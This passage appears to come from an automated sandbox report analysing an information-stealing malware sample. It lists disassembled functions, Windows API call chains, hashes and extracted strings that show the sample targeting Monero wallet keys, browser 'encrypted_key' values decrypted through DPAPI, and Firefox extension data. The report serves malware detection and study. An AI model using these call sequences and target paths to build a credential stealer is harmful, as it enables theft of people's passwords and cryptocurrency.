                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00E1A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00E1A6BC
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 59d92dbbfe058625a93bceb1d3e4839c0accc4f683f2000350883782bea91636
                                • Instruction ID: c3f4bb63dec4e354ca34c779c17d3f451c24628d0c009fb2cea035cbdd591b46
                                • Opcode Fuzzy Hash: 59d92dbbfe058625a93bceb1d3e4839c0accc4f683f2000350883782bea91636
                                • Instruction Fuzzy Hash: 88E11F728101289BCB1CEBA4EC96EEE7378AF58300F549179F51772091EF746A49CB72
                                Function 00E1D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D481
                                • lstrlen.KERNEL32(00000000), ref: 00E1D698
                                • lstrlen.KERNEL32(00000000), ref: 00E1D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b40095ac7eddefe100d25ee6157515b69f02b2bc761f91cd50c1f7a2883d4bd
                                • Instruction ID: 08d1fdb92d740ea84c338eae2241331a031f7b22996b9dc358846f4ecf9936e4
                                • Opcode Fuzzy Hash: 3b40095ac7eddefe100d25ee6157515b69f02b2bc761f91cd50c1f7a2883d4bd
                                • Instruction Fuzzy Hash: 909120729101289BCB18FBA0EC96DEE73B8AF54300F545179F507B3091EF746A49CB62
                                Function 00E1D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D801
                                • lstrlen.KERNEL32(00000000), ref: 00E1D99F
                                • lstrlen.KERNEL32(00000000), ref: 00E1D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 28a415ed9c9cf74a2b4e2854c53b974cf64e605ce050ebb42ca9f1a3574076ea
                                • Instruction ID: 2e0dccfdb33b1da52b8bf5667a814dd7f7478ac2bab25c1f888b86b0d56167ad
                                • Opcode Fuzzy Hash: 28a415ed9c9cf74a2b4e2854c53b974cf64e605ce050ebb42ca9f1a3574076ea
                                • Instruction Fuzzy Hash: 1A810E729101289BCB18FBA4EC96DEE73B8AF54300F445539F507B7091EF746A49CBA2
                                Function 00E1F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E31580,00E30D92), ref: 00E1F54C
                                • lstrlen.KERNEL32(00000000), ref: 00E1F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: ebbce613f4a40908f4b7d63f00cc0f6a9295f610e0bf97f69366744094046ef6
                                • Instruction ID: 0563d9efdef768516c2c1f49df6074fce70fc0769b5f742442f9662262040c9e
                                • Opcode Fuzzy Hash: ebbce613f4a40908f4b7d63f00cc0f6a9295f610e0bf97f69366744094046ef6
                                • Instruction Fuzzy Hash: C7510172D10118ABDB08FBA0FC56DED77B8AF54300F449539F41677192EE746A09CBA2
                                Function 00E270D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-3520659465
                                • Opcode ID: 9b0fc912955ab828a5797528b81781b4f70c66319712a3a0085e2361cc8cd7f9
                                • Instruction ID: 48cf1fdb9707667a11200c04ce75a68df7be01a275eb3ea724788c4d1b28be4f
                                • Opcode Fuzzy Hash: 9b0fc912955ab828a5797528b81781b4f70c66319712a3a0085e2361cc8cd7f9
                                • Instruction Fuzzy Hash: 5C5171B1D04228DBDB24EB90EC55BEEB3B4AF44304F2451A8E15577181EB746E88CF55
                                Function 00E23560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 53787555341a1fca1e3dea80cf4809127c6c7e21a438fca01f51bf5a29816cea
                                • Instruction ID: 03023b1f4276f2b188d010e5b2bbf5992e43fa57b3c290cb1a07fd40ab37ef8c
                                • Opcode Fuzzy Hash: 53787555341a1fca1e3dea80cf4809127c6c7e21a438fca01f51bf5a29816cea
                                • Instruction Fuzzy Hash: 254131B1D10219EFCB08EFB4E859AFEB7B8AF44304F049429E41677251DB759A05CFA1
                                Function 00E19CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E19D39
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                  • Part of subcall function 00E19AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                  • Part of subcall function 00E19AC0: LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                  • Part of subcall function 00E19B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E19B84
                                  • Part of subcall function 00E19B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E19BA3
                                  • Part of subcall function 00E19B60: LocalFree.KERNEL32(?), ref: 00E19BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 94faadb114e69c364ef37cc27dd6feeed0bed33f7ff25334ba3f8f590278af44
                                • Instruction ID: b484fc0810d8dfade579e30176162f82342f241b00bb711a61284dc3d08c961f
                                • Opcode Fuzzy Hash: 94faadb114e69c364ef37cc27dd6feeed0bed33f7ff25334ba3f8f590278af44
                                • Instruction Fuzzy Hash: B7314DB6D10209ABCF04DFE4EC95AEFB7B8BF48304F145559E905B7242EB309A44CBA1
                                Function 00E2C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00E2C74E
                                  • Part of subcall function 00E2BF9F: __amsg_exit.LIBCMT ref: 00E2BFAF
                                • __getptd.LIBCMT ref: 00E2C765
                                • __amsg_exit.LIBCMT ref: 00E2C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00E2C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: b24b37fadb6c4b614efa3cbe7f4d5136a8009bfd42b68a73da47473cb25eba8d
                                • Instruction ID: 50aaf90e2d2e7a67b4f448e4dbd4af0bd3b0a8860284343e1c331537ab52d45c
                                • Opcode Fuzzy Hash: b24b37fadb6c4b614efa3cbe7f4d5136a8009bfd42b68a73da47473cb25eba8d
                                • Instruction Fuzzy Hash: 05F09A32A007349BE721BBB8BC0AB5E37E06F00724F39624AF555B61D2DB6859809E56
                                Function 00E24F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24F7A
                                • lstrcat.KERNEL32(?,00E31070), ref: 00E24F97
                                • lstrcat.KERNEL32(?,008F8AA0), ref: 00E24FAB
                                • lstrcat.KERNEL32(?,00E31074), ref: 00E24FBD
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E2492C
                                  • Part of subcall function 00E24910: FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                  • Part of subcall function 00E24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                  • Part of subcall function 00E24910: FindClose.KERNEL32(000000FF), ref: 00E24B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
